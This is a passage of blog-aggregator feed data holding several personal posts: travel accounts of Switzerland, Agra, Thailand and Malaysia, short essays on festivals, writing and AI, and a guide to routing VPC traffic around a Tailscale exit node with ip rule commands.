Choudhary","sakekc","\u002Fimages\u002Fsaketchoudhary_photo.jpg","https:\u002F\u002Fsaket-choudhary.me\u002Ffeed.xml",{"slug":987,"title":988,"link":989,"pubDate":990,"contentSnippet":991,"tags":992,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"random-kind-stranger","A Random Act of Kindness","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Frandom-kind-stranger\u002F","2024-04-21T00:00:00.000Z","Last month, I did a wonderful trip travelling through the scenic landscapes of Switzerland. My wife and I were in Lucerne and had scheduled a day trip to Mt. Titlis for the next day but were wondering what to do that evening. After strolling along the Chapel Bridge and enjoying an amazing lunch by the waterfront, my wife and I collectively decided to book a Lake Lucerne cruise for the evening. It seemed like the perfect setup for a romantic date night, or so I thought!\n\nWe got the tickets from the information booth for the evening and went back to our hotel to freshen up and relax for a bit.\nWe arrived exactly at 6:45 PM, as mentioned on our tickets, and started to wait. Except, there were only the two of us waiting. We waited for probably half an hour, until 7:15 PM, which was the departure time. Knowing how precise the Swiss transport system usually is, I sensed something fishy. Luckily, I spotted Martin, a staff member of the cruise company, and asked him about it. He looked puzzled by my question and informed me that there was no cruise scheduled for today. Yep, not today, not tomorrow, and not for the rest of the weekend. It was Easter time, and all the cruise trips were cancelled. In fact, he was quite as puzzled as I was as to how the lady at the ticket counter even gave us the tickets for today. However, he told me that he couldn’t do much and suggested writing an email for a refund. I was a bit sad as this dashed our evening plans, but I thought, fine… Shit happens. It’s not the end of the world!\nAnd then, out of nowhere, by pure serendipity, my wife spotted another member of the cruise—this time, in fact, the captain! She began to tell the captain about our ordeal. The captain, a very warm and kind lady, listened to my wife patiently and understood our plight! She apologized on behalf of her company and immediately offered a refund in cash for the tickets that we had purchased. We were quite happy, as following up on emails, etc., was something that I was not particularly excited about looking forward to during the other half of my trip. So we said yes, except she needed to go to the ATM to draw cash. We waited for her and chatted with Martin about random stuff! He told us some really fun stories about how Toblerone’s iconic packaging no longer features the Matterhorn mountain. He also shared practical advice on how to safeguard oneself against pickpockets in Italy(we were gonna visit it soon), and reminisced about his life in Zermatt before relocating to Lucerne.\nAnyway, the wait stretched longer than usual, and I found myself wondering about her whereabouts. And then finally, we saw her approaching us. She told us that she hadn’t found a working ATM nearby, and had to go a bit far. But she didn’t come back empty-handed; she also brought us macaroons as a token of her apologies, a gesture that was incredibly thoughtful. She handed us 200 CHF in cash, covering more than the 180 CHF we had paid for our tickets. When we attempted to return the excess 20 CHF, she firmly refused to take it back. Despite our insistence on returning the excess 20 CHF, she remained steadfast, refusing to accept it. She encouraged us to use the extra money to enjoy a few drinks, suggesting it as a consolation for our evening plans being spoiled by the canceled cruise.\n\nI am glad the cruise didn’t happen. Life has its own ways of revealing that kindness exists in every corner of the world, and serendipity can lead to the most memorable encounters! For most, it may not be a huge thing, but for me, it was a profoundly touching and generous act from a stranger who simply chose to be kind without any ulterior motives.\nThe lesson: Be kind to others, do no harm, and always pay it forward. :)\nFin!",[],{"slug":994,"title":995,"link":996,"pubDate":997,"contentSnippet":998,"tags":999,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"dying-excitement-of-festivals","The Dying Excitement Of Festivals","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fdying-excitement-of-festivals\u002F","Sat, 06 Apr 2024 13:09:55 +0000","I don’t know why but since 2020 (COVID era) festivals don’t feel the same anymore. I had the excitement and would eagerly wait for Holi (and other festivals) before. Maybe it’s because I have grown up? But that doesn’t explain why others feel the same. Somehow I think this is related with the growth of short form content on the Internet like Instagram Reels and Tiktok. People are busy scrolling and the algorithm is busy feeding them, the cycle continues.",[],{"slug":1001,"title":1002,"link":1003,"pubDate":1004,"contentSnippet":1005,"tags":1006,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-12","Writing maketh the 10x Developer. More so the 10x development team.","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwriting-maketh-the-10x-developer\u002Findex.html","Fri, 05 Apr 2024 00:00:00 +0000","Writing is thinking. Software is peoples' thoughts on repeat. Developers who can pen their thoughts clearly multiply their impact. This matters even more in group work. Common sense rules; no literature major necessary.",[49,55,54,243,53,246,227],{"slug":1008,"title":1009,"link":1010,"pubDate":1011,"contentSnippet":1012,"tags":1013,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"taj-mahal","A visit to the Taj Mahal","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ftaj-mahal\u002F","Fri, 29 Mar 2024 15:43:21 +0530","Introduction\nI visited the Taj Mahal this month with my friend Badri. Taj Mahal is a major tourist attraction, getting 7-8 million visitors per year. It is one of the most beautiful pieces of architecture.\nJourney to Agra\nTaj Mahal is in the city of Agra, which is 188 km from Delhi by train. We had booked a train by the name of Taj Express from Hazrat Nizamuddin station in Delhi to Agra Cantt railway station. The night before the journey, we stayed in a retiring room at Old Delhi railway station because we could not get one at Hazrat Nizamuddin station. Retiring rooms are accommodations for the passengers at the railway stations, which require a confirm train ticket to stay.\nOf all the retiring rooms I have been to, locating the ones at Old Delhi station was the most challenging. I recommend reading Badri’s blog post, where he details our experience with this and other retiring rooms.\n\n      \nOur retiring room at the Old Delhi Railway Station.\nThe next day, we barely reached Hazrat Nizamuddin station in time for the train. However, the train had not yet arrived at the station and was delayed by half an hour.\nArrival in Agra\nWe reached Agra Cantt station at 10:30 hours, where we stayed in a retiring room. Before heading out to Taj Mahal, we rested in our rooms for a couple of hours, followed by having lunch at the station. As we came out of the station, we were approached by an autorickshaw driver who quoted the price to Taj Mahal as 150 INR. I negotiated the price down to 60 INR, which the driver agreed to on the condition of sharing the ride with other passengers. When we realized he was not making any effort to bring in more passengers to share the ride with, we walked away.\nAs we came out of the station complex, an autorickshaw driver offered a ride to the Taj Mahal for 20 INR per person on a sharing basis, or 100 INR for a reserved ride. We agreed to share the ride with other passengers for 20 INR, but the driver started driving as soon as we got in. We mistook the other person in the autorickshaw for a passenger we were sharing the ride with, but later found out that they were with the driver. Upon reaching the outer gate of the Taj Mahal, we paid him 40 INR as agreed, but he insisted that we had reserved the auto. We told him that we did not reserve the auto, but rather chose the sharing option. He insisted on this for some time. I suspect it was a scam, but we just walked away, and he didn’t pursue us further.\nExploring the Taj Mahal\nThe autorickshaw dropped us at one of the outer gates, from where we had to walk about 500 meters to reach the ticket counter just outside the west gate. We bought tickets worth 250 INR per person, which also allowed us to enter the mausoleum. Then we proceeded to the security check before entering the Taj Mahal complex.\n\n      \nSecurity outside the Taj Mahal complex.\n\n      \nThis red-colored building is the entrance to where you can see the Taj Mahal.\n\n      \nTaj Mahal.\nUpon entering, we saw red sandstone walls on three sides enclosing the Taj Mahal complex. We took photos using my phone and a Fujifilm camera. Later, we learned that we needed to cover our shoes before entering the mausoleum. We also saw a few people barefoot, but we couldn’t find a place to leave our shoes. We came out of the whole complex at 18:00 hours and had snacks with tea at a nearby shop. I also bought a fridge magnet as a souvenier for 30 INR.\n\n      \nShoe covers for going inside the mausoleum.\n\n      \nTaj Mahal from a side angle.\nOur next destination was Jaipur and we had booked our seats in a train from Agra Cantt station. We decided to walk towards the station, hoping to have dinner along the way. However, we could not find a place to eat. Since we enjoyed the lunch at the station earlier, we went there for dinner as well, after which we boarded our train to Jaipur. On our way back to the station, I found the bus station for the Taj Mahal.\nExpenses\nThese were our expenses per person:\nDescription\nAmount (Indian Rupees)\n\n\n\n\nRetiring room at Delhi Railway Station (12 hours)\n\n131\n\n\n\nTrain ticket from Delhi to Agra (Taj Express)\n\n110\n\n\n\nRetiring room at Agra Cantt station for 12 hours:\n\n450\n\n\n\nAuto-rickshaw to Taj Mahal\n\n20\n\n\n\nTaj Mahal ticket (including entry to the mausoleum)\n\n250\n\n\n\nFood\n\n350\n\n\n\nTotal\n\n1,311",[],{"slug":1015,"title":1016,"link":1017,"pubDate":1018,"contentSnippet":1019,"tags":1020,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"travel-tailscale","Travelling with Tailscale","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Ftravel-tailscale\u002F","2024-03-27T00:00:00.000Z","I have an upcoming trip to Europe, which I am quite excited about. I wanted to set up a Tailscale exit node to ensure that critical apps I depend on, such as banking portals continue working from outside the country. Tailscale provides a feature called “Exit nodes”. These nodes can be setup to route all traffic (0.0.0.0\u002F0, ::\u002F0) through them.\nI deployed a tiny DigitalOcean droplet in BLR region and setup Tailscale as an exit node. The steps are quite simple and can be found here.\n$ echo 'net.ipv4.ip_forward = 1' | sudo tee -a \u002Fetc\u002Fsysctl.d\u002F99-tailscale.conf\n$ echo 'net.ipv6.conf.all.forwarding = 1' | sudo tee -a \u002Fetc\u002Fsysctl.d\u002F99-tailscale.conf\n$ sudo sysctl -p \u002Fetc\u002Fsysctl.d\u002F99-tailscale.conf\n$ sudo tailscale up --advertise-exit-node\nThe node is now advertised as an exit node, and we can confirm that from the output of tailscale status:\n$ sudo tailscale status                       \n100.78.212.33   pop-os               mr-karan@    linux   -\n100.75.180.88   homelab              mr-karan@    linux   -\n100.100.191.57  iphone               mr-karan@    iOS     offline\n100.123.189.14  karans-macbook-pro   mr-karan@    macOS   offline\n100.104.67.7    lab                  mr-karan@    linux   offline\n100.108.220.87  tailscale-exit       mr-karan@    linux   active; exit node; direct 167.71.236.222:41641, tx 21540 rx 17356\nOn the client side, I was able to start Tailscale and configure it to send all the traffic to the exit node with:\nsudo tailscale up --exit-node=100.108.220.87\nWe can confirm that the traffic is going via the exit node by checking our public IP from this device:\n➜ curl  https:\u002F\u002Fipinfo.io \n{\n  \"ip\": \"167.x.x.222\",\n  \"city\": \"Doddaballapura\",\n  \"region\": \"Karnataka\",\n  \"country\": \"IN\",\n  \"loc\": \"13.2257,77.5750\",\n  \"org\": \"AS14061 DigitalOcean, LLC\",\n  \"postal\": \"560100\",\n  \"timezone\": \"Asia\u002FKolkata\",\n  \"readme\": \"https:\u002F\u002Fipinfo.io\u002Fmissingauth\"\n}                            \nHowever, I encountered a minor issue since I needed to bring my work laptop for on-call duties, in case any critical production incidents required my attention during my travels. At my organization, we use Netbird as our VPN, which, like Tailscale, creates a P2P overlay network between different devices.\nThe problem was that all 0.0.0.0 traffic was routed to the exit node, meaning the internal traffic meant for Netbird to access internal sites on our private AWS VPC network was no longer routed via the Netbird interface.\nNetbird automatically propagates a bunch of IP routing rules when connected to the system. These routes are to our internal AWS VPC infrastructure. For example:\n10.0.0.0\u002F16 via 100.107.12.215 dev wt0\nHere, wt0 is the Netbird interface. So, for example, any IP like 10.0.1.100 will go via this interface. To verify this:\n$ ip route get 10.0.1.100\n10.0.1.100 dev wt0 src 100.107.12.215 uid 1000 \nHowever, after connecting to the Tailscale exit node, this was no longer the case. Now, even the private IP meant to be routed via Netbird was being routed through Tailscale:\n$ ip route get 10.0.1.100\n10.0.1.100 dev tailscale0 table 52 src 100.78.212.33 uid 1000 \nAlthough Tailscale nodes allow for the selective whitelisting of CIDRs to route only the designated network packets through them, my scenario was different. I needed to selectively bypass certain CIDRs and route all other traffic through the exit nodes. I came across a relevant GitHub issue, but unfortunately, it was closed due to limited demand.\nThis led me to dig deeper into understanding how Tailscale propagates IP routes, to see if there was a way for me to add custom routes with a higher priority.\nInitially, I examined the IP routes for Tailscale. Typically, one can view the route table list using ip route, which displays the routes in the default and main tables. However, Tailscale uses routing table 52 for its routes, instead of the default or main table.\n$ ip route show table 52                                                           \n\ndefault dev tailscale0 \n100.75.180.88 dev tailscale0 \n... others ...\nthrow 127.0.0.0\u002F8 \n192.168.29.0\u002F24 dev tailscale0 \nA few notes on the route table:\ndefault dev tailscale0 is the default route for this table. Traffic that doesn’t match any other route in this table will be sent through the tailscale0 interface. This ensures that any traffic not destined for a more specific route will go through the Tailscale network.\nthrow 127.0.0.0\u002F8: This is a special route that tells the system to “throw” away traffic destined for 127.0.0.0\u002F8 (local host addresses) if it arrives at this table, effectively discarding it before it reaches the local routing table.\nWe can see the priority of these IP rules are evaluated using ip rule show:\n➜ ip rule show          \n0:\tfrom all lookup local\n5210:\tfrom all fwmark 0x80000\u002F0xff0000 lookup main\n5230:\tfrom all fwmark 0x80000\u002F0xff0000 lookup default\n5250:\tfrom all fwmark 0x80000\u002F0xff0000 unreachable\n5270:\tfrom all lookup 52\n32766:\tfrom all lookup main\n32767:\tfrom all lookup default\nThis command lists all the current policy routing rules, including their priority (look for the pref or priority value). Each rule is associated with a priority, with lower numbers having higher priority.\nBy default, Linux uses three main routing tables:\nLocal (priority 0)\nMain (priority 32766)\nDefault (priority 32767)\nSince Netbird already propagates the IP routes in the main routing table, we only need to add a higher priority rule to lookup in the main table before Tailscale takes over.\n$ sudo ip rule add to 10.0.0.0\u002F16 pref 5000 lookup main\nNow, our ip rule looks like:\n$ ip rule show          \n0:\tfrom all lookup local\n5000:\tfrom all to 10.0.0.0\u002F16 lookup main\n5210:\tfrom all fwmark 0x80000\u002F0xff0000 lookup main\n5230:\tfrom all fwmark 0x80000\u002F0xff0000 lookup default\n5250:\tfrom all fwmark 0x80000\u002F0xff0000 unreachable\n5270:\tfrom all lookup 52\n32766:\tfrom all lookup main\n32767:\tfrom all lookup default\nTo confirm whether the packets for destination 10.0.0.0\u002F16 get routed via wt0 instead of tailscale0, we can use the good ol’ ip route get:\n$ ip route get 10.0.1.100 \n10.0.1.100 dev wt0 src 100.107.12.215 uid 1000\nPerfect! This setup allows us to route all our public traffic via exit node and only the internal traffic meant for internal AWS VPCs get routed via Netbird VPN.\nSince, these rules are ephemeral and I wanted to add a bunch of similar network routes, I created a small shell script to automate the process of adding\u002Fdeleting rules:\n#!\u002Fbin\u002Fbash\n\n# Function to add IP rules for specified CIDRs\nadd() {\n    echo \"Adding IP rules...\"\n    sudo ip rule add to 10.0.0.0\u002F16 pref 5000 lookup main\n    # ... others ...\n}\n\n# Function to remove IP rules based on preference numbers\nremove() {\n    echo \"Removing IP rules...\"\n    sudo ip rule del pref 5000\n    # ... others ....\n}\n\n# Check the first argument to determine which function to call\ncase $1 in\n    add)\n        add\n        ;;\n    remove)\n        remove\n        ;;\n    *)\n        echo \"Invalid argument: $1\"\n        echo \"Usage: $0 add|remove\"\n        exit 1\n        ;;\nesac\nFin!",[],{"slug":1022,"title":1023,"link":1024,"pubDate":1025,"contentSnippet":1026,"tags":1027,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"thailand-trip","Thailand Trip","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fthailand-trip\u002F","Fri, 22 Mar 2024 02:15:00 +0530","Arrival\nI was staying at a hostel in Bukit Bintang, a shopping hub and entertainment center of Kuala Lumpur, which was like 200 metres from the monorail station, where I took a metro train for KL Sentral. Then I took a bus from KL Sentral to the airport, followed by taking a Malaysian Airlines flight to Bangkok. Meals were included without any extra charge.\nThe flight took around 2 hours, landing in Bangkok’s Suvarnabhumi Airport at around 15:00 hours local time. My friend Fletcher was leaving for Pattaya from Bangkok, which is about 150 km and 2 hours bus ride, but takes a longer time from within the Bangkok city compared to Suvarnabhumi Airport due to the traffic in Bangkok. We had planned to meet in Pattaya and had already booked a hostel there. At the bus counter, I came to know that buses leave for Pattaya every hour. However, the next bus for which tickets were available was at scheduled to leave at 19:00 hours.\nThe ticket cost was 143 Thai Baht (360 Indian Rupees) per seat. This left me with a couple of hours at the airport, which I spent charging my phone, exploring shops and eating snacks which I had packed. As I had one week to spend in Thailand, buying a SIM card was essential to have internet access on the go. The internet plans I checked at the airport were expensive compared to Kuala Lumpur, so I didn’t buy a SIM card from there, leaving me with no way to coordinate with Fletcher.\n\n      \nWelcome sign at Bangkok's Suvarnabhumi airport.\n\n      \nBus from Suvarnabhumi Airport to Jomtien Beach in Pattaya.\nPattaya\nMy bus left airport at 7 PM and dropped me at the last stop named Jomtien beach in Pattaya at around 9 PM. The bus journey was smooth, thanks to good roads and lack of traffic jam. I used OsmAnd app for navigation and decided to walk to my hostel as it was around 1 km away. While walking, I noticed Cannabis bars on the street side and ubiquitous massage parlors, not to mention the street prostitutes vying for your attention.\nAfter some time, I realized that the address mentioned on the hostel receipt was different from the one OpenStreetMap was showing, leading me to ask a person sitting at a café for help. That person agreed to help me and took me to the exact place where the hostel was. On the way, he told me he was originally from Kuwait but lived in Pattaya for many years. He also told me about the shared hail-and-ride cheap songthaew rides which ran along the Jomtien Beach, charging 10 Baht (25 Rupees) for any distance along that route, making our trip cost-effective.\n\n      \nPhoto of a songthaew in Pattaya. These songthaews run along Jomtien Second road and take 10 Thai Baht to anywhere on the route.\n\n      \nRoad near Jomtien beach in Pattaya\nI was at my hostel, but I was still not sure if I was at the correct place. There was no reception in sight, but only a staircase. In the meanwhile, I bumped into Fletcher, which gave me a sigh of relief. Adjacent to the property was a hairdresser who helped us get into the hostel. This was my first time checking in to a hostel without a reception. It seemed like a shared room without service. After some time, we went outside and bought a SIM card for me at a 7-Eleven store. The cost was 399 Baht for 7 day unlimited internet.\nNext day, we went to Pattaya Tiger Park where you can go inside the tiger’s cage and touch the tiger. Then we went to the nearby Floating Market but decided against going inside after reviewing ticket prices which were higher than we deemed worthwhile. After this, we walked towards the Jomtien beach, but I planned to hitchhike as it was very sunny, and our drinking water supply was getting depleted. A few cars passed by without responding, but a scooty stopped and picked us up. Initially, I thought he would let only one of us ride, but to my surprise he let both of us on it. During the ride, he told us he is from Delhi and dropped us at walking distance from the bus station where Fletcher had to board his bus for Bangkok.\n\n      \nA welcome sign at Pattaya Floating market.\n\n      \nJomtien Beach in Pattaya.\nIn the evening, I went to a shop which was selling fruits like guavas, dragon fruits, mangoes. I sampled guavas, which I found tasty and got mangoes and dragon fruits packed for eating later, and they were yummy.\nBangkok\nNext day, on 9th Feb, I left for Bangkok, taking the bus at the bus station where the bus from Suvarnabhumi Airport dropped me the other day. I reached the airport in 2 hours and boarded a metro train from there to Huai Khwang, followed by walking to my hotel. This hotel room costed 5600 INR for four days for a double bed. In Bangkok too, I found abundance of convenience stores like 7-Eleven, similar to Pattaya and Kuala Lumpur. I had difficulty finding vegetarian food and labels were in Thai language, and the staff didn’t know English.\n\n      \nA board showing coffee menu at a 7-Eleven store along with rates in Pattaya.\n\n      \nIn this section of 7-Eleven, you can buy a premix coffee and mix it with hot water provided at the store to prepare.\nNext day, on 10th Feb 2024 was Chinese New year. I didn’t see a lot of celebrations in my area, but I saw celebratory programs and discount sales while I was in Kuala Lumpur, a few days before the Chinese New Year. In terms of food, I mainly relied on fruits. The pineapples were different from what I have seen in India, and this was the first time I saw banana flesh yellow. I tried Korean vegetable noodles, which were good. Another option was eating bread and cheese from the 7-Eleven. I also tried some Indian food like Chhole Kulche at Sukhumvit and some paneer dish at Ratchada Night market.\n\n      \nBanana with yellow flesh\n\n      \nFruits at a stall in Bangkok\n\n      \nTrimmed pineapples from Thailand.\n\n      \nCorn in Bangkok.\n\n      \nThis Korean Vegetasty noodles pack was yummy and was available at many 7-Eleven stores.\nI explored malls in Siam and explored the area around Sukhumvit. The highlight of my Bangkok trip was the Chao Phraya Express Boat, which sails on the Chao Phraya River and covers some important tourist destinations of Bangkok. I took the all day river pass for the boat for 150 Thai Baht, which allows you to hop on and off any boat at any station for the day, only to realize later that it would have been better to buy respective station tickets to reduce the costs. I highly recommend taking the boat ride as it offers stunning views of the city. I went to Wat Arun, a famous Buddhist temple and a major tourist attraction. Upon entering the temple after buying the ticket, they stamped my hand ;)  Following this, I took a boat to the famous Khao San Road, which is famous for cheap accommodations and food stalls.\n\n      \nWat Arun temple stamps your hand upon entry\n\n      \nWat Arun temple\n\n      \nKhao San Road\n\n      \nA food stall at Khao San Road\n\n      \nChao Phraya Express Boat\nI had booked a flight from Bangkok to Delhi with Air India, and during the flight, they were serving alcohol onboard. I decided to try red wine, marking my first experience of consuming alcohol while flying.\n\n      \nRed wine being served in Air India\nNotes\nThere are many malls in Bangkok and you can easily find toilets\u002Frestrooms, which can help to avoid paying for using washrooms.\nCompared to Malaysia, I found Thailand more expensive, contrary to expectations. In addition, shopping in Malaysia was quite cheap due to Chinese New Year discounts, which I didn’t see in Thailand.\nI liked Pattaya more than Bangkok, mainly due to Pattaya having a nice beach and I could engage with locals and foreigners. Perhaps booking a hostel instead of a hotel in Bangkok would have given more opportunities to engage with people.",[],{"slug":1029,"title":1030,"link":1031,"pubDate":1032,"contentSnippet":1033,"tags":1034,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-13","Halting AI","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhalting-ai\u002Findex.html","Wed, 13 Mar 2024 00:00:00 +0000","The current wave of AI tools is incredibly cool. I hope more people get distracted by the incredible coolness and bet on this wave of AI, because I'm betting the other way, on the hot mess of human general intelligence.",[55,49,244,245,246],{"slug":1036,"title":1037,"link":1038,"pubDate":1039,"contentSnippet":1040,"tags":1041,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"malaysia-trip","Malaysia Trip","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fmalaysia-trip\u002F","Sat, 02 Mar 2024 19:29:59 +0530","Introduction\nIn January of this year, my friend Snehal invited me to Vienna, Austria, but our plans were thwarted when Austria refused me a visa. So, I thought about traveling to a country that does not require a visa, and a few candidates came to mind, one of them being Malaysia which had recently waived visa requirements for Indian tourists. I also included Thailand, as it was visa-free, near to Malaysia, and is one of the most popular tourist destinations in the world.\nI booked an AirAsia flight from Delhi, India, to Kuala Lumpur, Malaysia; a Malaysia Airlines flight from Kuala Lumpur to Bangkok; and an Air India ticket from Kuala Lumpur to Delhi.\nBoarding from the Delhi Airport\nOn the 31st of January, before boarding my flight to Kuala Lumpur, I went to the AirAsia counter to obtain my boarding pass. During this process, the airline staff asked me a range of questions, from the usual - such as my purpose of visit, hotel bookings, and return ticket - to the ridiculous, including requests for invoices of hotel bookings, email confirmations of my return ticket, and the amount of currency I was carrying.\nI didn’t have the invoices of my bookings as I didn’t pay for them in advance except for the first night, nor could I find the confirmation email by Air India. I was afraid that the airline staff might not give me the boarding pass, which is required to board the flight. I never had such experiences at airports in other countries.\nThen I passed through the immigration where I was asked sensible questions such as my country of visit and return tickets.  Following this, I went through security check, and proceeded to the flight’s boarding gate. Unfortunately, my flight was delayed by three hours. Even though AirAsia is a budget airline, I was surprised to find out that drinking water inside the plane was not free-of-cost, only hot drinking water was. It was a direct flight, which took 5 hours to reach Kuala Lumpur. I landed at Kuala Lumpur’s KLIA2 airport at around 09:00 hours local time (which is 2 hours 30 minutes ahead of Indian time) on the 1st of Feb.\nDay 1: Arrival in Kuala Lumpur\nAfter arrival at the Kuala Lumpur airport, I went through immigration where I was asked my purpose of visit, number of people accompanying me, number of days of stay, return\u002Fonward tickets and hotel bookings.\n\n      \nKuala Lumpur International Airport.\nI had filled Malaysia Digital Arrival Card a day before my flight’s scheduled departure as per my travel agent’s advice, though the immigration officer didn’t ask for it. The immigration officer stamped my passport, after which I went through custom clearance. After clearing customs, I roamed around the airport and checked out SIM and internet plans, without buying.\n\n      \nMalaysian entry stamp on my passport.\nMalaysia’s currency is the Malaysian ringgit, abbreviated as MYR. One MYR was equivalent to 18 Indian Rupees (INR). I exchanged Malaysian ringgit at a money exchange in my hometown.\nMy stay was booked at a hostel called Travel Hub Guesthouse in the Chinatown area of Kuala Lumpur, which was within walking distance of the Pasar Seni metro station, known as LRT station in local jargon. Every booking included a MYR 10 tourism tax per night. The hostel stay was 26.71 MYR plus 10 MYR (taxes), adding up to a total of 36.71 MYR (660 INR) per night.\nKL Sentral serves as the city center and is located about 50 km from the airport. The rapid train from the airport to KL Sentral costs 55 MYR (approximately 1,000 INR), which I found to be quite expensive. Instead, I opted for the bus, which was a more economical choice at 15 MYR (approximately 270 INR). The bus took about an hour to reach KL Sentral and had comfortable seats. The well-maintained roads made my overall journey smooth and offered a glimpse of Kuala Lumpur city.\n\n      \nInterior view of the bus.\nAs soon as I checked in and entered my room, I met an Indian named Fletcher, who was also a tourist, and been in Kuala Lumpur for a couple of days, was planning to visit the National Museum and I joined him out of excitement for exploration, even though I was too tired after such a long trip and wanted to rest instead.\n\n      \nLRT at KL Sentral.\n\n      \nEntrance of Pasar Seni LRT station\n\n      \nRoom inside Travel Hub Guesthouse.\nIn the evening, I visited the National Museum (ticket was 5 MYR, equivalent to 90 INR) with Fletcher, and explored Little India, which had abundance of Indian food restaurants, especially by Tamils, making vegetarian food easily available. I came across a stall where I drank masala tea and sampled Mee Goreng. A quick search on the internet revealed that Mee Goreng is a dish unique to Indian immigrants in Malaysia and neighboring countries, but not found in India!\n\n      \nBoard welcoming us to Little India\n\n      \nMee Goreng, a dish made of noodles in Malaysia.\nDay 2: Visiting Batu Caves and Petronas Towers\nTo stay with Fletcher, I extended my stay at the same hostel for one night. The next day (February 2nd), Fletcher went on a day trip to the Genting Highlands. Although I planned to join him, I couldn’t because his bus had no available bookings when we reached the KL Sentral station the next day. I noticed that at the KL Sentral station, bus tickets need to be paid for using a card or can be booked online through websites like RedBus. They had a cash option at the KL airport, but not at KL Sentral.\nI took the opportunity to buy a local SIM card from the company CelcomDigi at the KL Sentral station for MYR 10, which included 5G internet up to 5 GB of usage. However, making calls required a recharge of MYR 5, which I didn’t include. At the bus ticket counter, I met a family from Delhi and joined them for a day trip to Batu Caves, which is a cave complex located on the outskirts of Kuala Lumpur.\nTo reach Batu Caves, we took the KTM Komuter train from KL Sentral station, which costs MYR 5.2 for a return journey. The train takes around 40 minutes to reach Batu Caves. Upon reaching there, we could immediately see the shrine of Murugan outside the Batu Caves. There were stairs leading to the caves. In order to take the stairs to the caves, make sure you cover your knees and shoulders. A woman from the family I went with was wearing shorts, so she had to buy a scarf worth MYR 15 to cover her knees for the entry. After climbing the stairs, we went inside the Temple Cave. This particular cave doesn’t have an entry fee, however some other caves (for example, the Ramayana Cave) have an entry fee. I didn’t go to the Ramayana Cave because I didn’t know about it.\n\n      \nKTM Komuter train\n\n      \nMurugan statue outside of Batu Caves.\n\n      \nView from the top after climbing all the stairs.\n\n      \nTemple inside the cave.\nThe temperature inside the cave was cooler. We spent some time resting inside the cave. After we were done, we returned to KL Sentral, and went our separate ways. I came back to hostel and rested for some time.\nMy trip to Kuala Lumpur would be incomplete without a photo at the iconic Petronas Towers, which was my next destination. To get there from my hostel, I took the LRT to KLCC station and then walked to the photo point of the Petronas Towers, where I asked an Indonesian tourist for help in taking my pictures.\n\n      \nMe at Petronas Towers.\nAfter roaming around at Petronas Towers, I gave a phone call to Fletcher who was on his way back to KL Sentral and we decided to meet there. We went to the same stall we had Mee Goreng the previous day and ordered Ghee Roast Dosa this time. We also had nice conversations with a family having Malaysian citizenship with Indian ancestry. Then, we went to another place to eat Roti Canai, which I had with dal. Interestingly, Roti Canai is another dish popularized by Indian immigrants in Southeast Asia, but it is not popular in India.\n\n      \nPhoto with Malaysians.\nDay 3: Berjaya Times Square and Bukit Bintang\nFor the third day (3rd Feb), I could not extend my hostel booking as it was fully booked due to weekend. So, I booked another hostel by the name of The Manor by Mingle for two nights, 1 km far from my previous hostel, which was MYR 99.34 (1800 INR) for two nights, including MYR 10 tourism fee per night. This was expensive compared to other hostels I stayed in this trip, probably due to weekend. It had a swimming pool, which was of no use to me. Further, it also had laundry services, which I used. The charges were MYR 5 for washing, while MYR 3 for the dryer.\nAfter checking-in and keeping my luggage into my room, I and Fletcher went to nearby shopping mall Berjaya Times Square, which was decorated in celebrations of the upcoming Chinese New Year on 8th Feb, due to which prices were greatly discounted. After roaming around and a bit of shopping, we went back to our respective hostels to take rest. At night, we went to Bukit Bintang, which is known for its nightlife and called the entertainment hub of the city.\n\n      \nBerjaya Times Square dipped in Chinese New Year celebrations.\nDay 4: Genting Highlands\nOn the 4th of Feb, I took a solo day trip to Genting Highlands, a hill station located on the outskirts of Kuala Lumpur. To reach there, I took a bus from KL Sentral (return ticket was MYR 20), which dropped me at the bus terminal below Awana Skyway cable car station. I took a cable car to reach Genting Highlands from there (MYR 18 for a return ticket), which passes through misty air along with stunning views. I roamed around and did some shopping, buying three T-Shirts for myself. Furthermore, I also sampled Paneer Makhani with naan for MYR 41.8 at a restaurant.\n\n      \nViews from cable car.\n\n      \nViews from cable car.\n\n      \nI ordered Paneer Makhani with naan at a restaurant in Genting Highlands.\nThere was not much to do here for me, as this place was popular for being the only legal place to gamble in Malaysia, nothing of my interest. Although the cable car ride had scenic views, I don’t think Genting Highlands was worth visiting. Sure, it’s a good place for a day trip from KL, but I had more time and should have instead gone to some other place like Cameron Highlands. Genting Highlands is for people staying for a couple of days in KL who don’t want to visit far-off places. I think my decision to visit Genting Highlands was a case of falling into the trap of herd mentality, as when I went to the bus counter a couple of days ago, I saw a big queue for Genting Highlands, which was the basis of my decision.\nI took the return cable car to reach the bus terminal, from where I took the bus for KL Sentral. Then I went to meet Fletcher, who was leaving for Bangkok. We later met in Pattaya, Thailand, after a few days, which will be covered in the next post.\nDays 5 and 6\nSince the hostel Manor by Mingle was a bit expensive, I booked a cheaper hostel for last two nights in Bukit Bintang. I didn’t really do much on last two days. I roamed around and added some places on the OpenStreetMap. As I was living in Bukit Bintang, I bought some souveniers from there and tried a middle-eastern dessert named Kunafa, which was yummy. I also discovered a shop named ‘I Love KL Gifts’ which had souvenirs at a great price.\n\n      \nKunafa, a middle-eastern dessert I sampled in Bukit Bintang.\n7th Feb: Malaysian Airlines to Bangkok\nOn the 7th of Feb, I took a Malaysian Airlines flight for Bangkok, which was scheduled to depart from KL Airport at 12:15 hours, but the departure got delayed by 2 hours, landing in Bangkok at around 15:00 hours local time (which is 1 hours 30 minutes ahead of Indian time). More details will be covered in the Thailand post.\n\n      \nMalaysian Airlines jet standing at KL 